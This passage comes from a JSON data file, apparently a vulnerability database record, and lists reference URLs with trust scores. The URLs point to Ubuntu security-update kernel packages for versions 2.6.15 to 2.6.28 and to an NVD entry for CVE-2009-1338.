        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-virtual_2.6.27-14.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-14.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-openvz_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-14.35.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-generic_2.6.27-14.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-54.77_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-generic_2.6.28-13.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-server_2.6.28-13.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-24.55_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64-smp_2.6.15-54.77_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-xeon_2.6.15-54.77_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1338"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-virtual_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-14.35_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-386_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-generic_2.6.15-54.77_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-server_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-13.45.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-13.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-386_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-k8_2.6.15-54.77_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc_2.6.24-24.55_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-sparc64_2.6.24-24.55_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-server_2.6.28-13.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-virtual_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-24.55_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-server_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
